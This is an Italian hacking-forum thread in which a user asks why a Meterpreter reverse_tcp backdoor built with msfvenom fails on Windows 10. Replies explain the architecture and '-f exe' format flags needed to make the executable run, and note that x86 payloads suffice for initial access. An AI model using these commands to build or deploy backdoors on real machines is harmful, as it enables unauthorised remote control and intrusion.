Domanda Malware Problema compatibilità backdoor con msfvenom

Maxwell2609

Utente Silver
29 Ottobre 2020
131
21
30
66
Salve a tutti. Uso da molto tempo il tool msfvenom per creare backdoor, ma ultimamente, quando le passo su windows 10 per testarle, appare all' avvio un messaggio popup che recita: Impossibile eseguire questa app nel tuo PC, per cercare una versione per il tuo PC, contatta il distributore del software
E' un problema di architettura? Di payload nell' exploit?
Ecco il comando che utilizzo per crearlo:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxxx -o hack.exe
 

0xbro

Super Moderatore
24 Febbraio 2017
4,052
154
3,040
1,645
Salve a tutti. Uso da molto tempo il tool msfvenom per creare backdoor, ma ultimamente, quando le passo su windows 10 per testarle, appare all' avvio un messaggio popup che recita: Impossibile eseguire questa app nel tuo PC, per cercare una versione per il tuo PC, contatta il distributore del software
E' un problema di architettura? Di payload nell' exploit?
Ecco il comando che utilizzo per crearlo:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxxx -o hack.exe
Prova a utilizzare il payload windows/x64/... e a settare anche il parametro -a (architettura), -f exe e --platform
 

czonta96

Utente Electrum
17 Gennaio 2022
198
61
122
199
Il post è vecchio, ma se qualcuno ci si imbatte oggi rischia di rimanere confuso.
È necessario specificare solamente il format "-f exe". Non è necessario specificare l'architettura del payload, in quanto msfvenom la riconosce automaticamente a seconda del payload scelto, esempio "windows/meterpreter/reverse_tcp" -> selected automatically arch x86 from the payload.
Ricordo inoltre che i payload x86 sono universali, in quanto supportati anche dai sistemi a x64. A meno che tu non debba fare lavori di post-exploitation specifici, i payload x86 vanno benissimo per ottenere un accesso iniziale al dispositivo che si intende attaccare. (sotto autorizzazione penso)